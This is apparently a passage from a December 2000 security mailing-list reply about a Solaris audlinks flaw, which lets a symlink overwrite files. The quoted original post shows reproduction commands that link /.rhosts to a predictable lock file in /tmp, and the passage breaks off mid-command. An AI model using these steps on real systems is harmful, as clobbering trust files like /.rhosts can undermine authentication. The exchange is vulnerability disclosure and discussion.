It was never stated you could use audlinks to gain root through
rsh/rlogin.
in my post I said you could use it to clobber (overwrite to clarify
because obviously I have to)
audlinks like many programs doesn't fstat the file it opens with O_RDWR
access properly.
As far as this posing a threat to
On Thu, Dec 28, 2000 at 02:34:50PM -0800, "Optyx - Uberhax0r
Communications"@SECURITYFOCUS.COM wrote:
> /usr/sbin/audlinks has the following behavior:
> $ id
> uid=100(optyx) gid=1(other)
> $ mkdir -p /tmp/b/dev
> $ ln -s /.rhosts /tmp/b/dev/.devfsadm_dev.lock
> $ su root
> Password:
> # /usr/sb